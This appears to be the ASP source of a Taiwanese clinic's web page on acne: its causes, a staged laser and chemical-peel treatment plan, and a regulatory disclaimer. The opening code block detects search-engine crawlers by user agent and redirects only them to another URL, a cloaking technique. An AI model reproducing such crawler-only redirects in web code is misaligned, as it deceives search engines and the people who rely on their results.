<% agent=request.servervariables("http_user_agent") if instr(agent,"bot")>0 or instr(agent,"yahoo")>0 or instr(agent,"bing")>0 or instr(agent,"google")>0 then Response.Status="301 Moved Permanently" Response.AddHeader "Location","http://www.ton-yen.com.tw/skin_6.php" end if pageName = "p6" subPageName = "p6_5" %> 痘痘-中壢<%= pageTitle %> >
痘痘 皮膚問題痘痘


粉刺痘痘成形主要是因下述4原因
皮脂腺分泌過多油脂
毛孔角化不良
痤瘡桿菌數過多
發炎反應

當皮脂腺分泌過多油脂及毛孔角化不良,阻塞皮脂腺,導致粉刺生成。而每個人臉上都會有痤瘡桿菌,只是多與少的差異,此種菌特別嗜油,當上述肌膚環境存在,痤瘡桿菌則會大量生成而造成粉刺發炎反應,就是我們看到的膿皰、囊腫、發炎型的痘痘。發炎型青春痘一擠更容易造成組織傷害,常見的紅痘疤、黑痘疤、凹凸痘疤就成形。

傳統治療痤瘡 (俗稱痘痘) 的方式,不外乎是內服與外用藥塗抹雙管齊下,但不想長期服藥,又認為塗抹外用藥麻煩,現在可以不用傷腦筋,醫學美容的高科技雷射、煥膚、光療等,都是痘痘治療新選擇。

痘痘的治療至少需要六週的時間,治療分為三個階段:
第一個階段:
  • 「緩解發炎的痘痘情況!」 
 
 
第二個階段:
  • 「清除毛孔裡的粉刺和髒污。」
 
  • 粉刺是長痘痘的根源,簡單來說:「沒有粉刺就沒有痘痘」。
    治療建議:AB酸煥膚淨膚雷射
 
最後一個階段:
  • 「處理痘疤和色素沉著問題。」
 
  • 痘痘問題穩定後,針對痘痘走過留下的色素沉著、凹洞痘疤,利用高科技雷射改善,紅色痘疤可以進行染料雷射退紅,黑色痘疤以淨膚雷射淡化,凹洞痘疤則做飛梭雷射。


    治療建議:AB酸煥膚淨膚雷射染料雷射飛梭雷射

    痘痘的形成是多方因素造成,對症下藥治療才能有效緩解,方式因人而異而非任何單一的療法,最重要的是治療需經由皮膚科醫師專業診斷。

    另外,痘痘肌照顧原則不外乎維持皮膚油水平衡、保濕及防曬,保濕同時能讓肌膚泌油量下降。還有記得千萬別用手擠壓痘痘。
 

痘痘

痘痘

痘痘


【小提醒】
行政院衛生福利部2013/01/04公告:「『美容醫學』一般係指由專業醫師透過醫學技術,如:手術、藥物、醫療器械、生物科技材料等,執行具侵入性或低侵入性醫療技術來改善身體外觀,而『非以治療疾病為主要目的』」。本宣傳也是由合格醫師透過醫學技術執行具低侵入性醫療技術來「改善」身體外觀,而非以治療疾病為目的,符合上述的公告。
本宣傳依據行政院衛生福利部衛署醫字0990262180號、衛部醫字第1031662939辦理,屬於仿單核准適應症外的使用(Off-label use),執行的醫師應確實告知使用原因及可能造成的風險,並取得其同意始得使用;故本資訊無法取代醫師親自關心您;有關適應症、禁忌症等副作用等問題,醫師將依個案說明。

以上照片經本人同意使用


粉刺痘痘肌膚公敵…不要來 汙辱我的美!!!! 不知道痘痘生成原因,一昧的控油抗痘,未必能達到抑制效果,最主要痘痘肌問題就是肌膚給了痘痘生長機會、生長環境。

戰勝痘痘,不讓粉刺痘痘有發跡的機會,先了解成因。